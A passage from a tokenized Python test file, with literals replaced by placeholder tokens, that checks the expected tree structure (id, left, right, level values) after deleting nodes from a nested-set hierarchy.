<NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child12 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child13 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_root2 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child21 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child211 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child212 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child2121 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child2122 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , 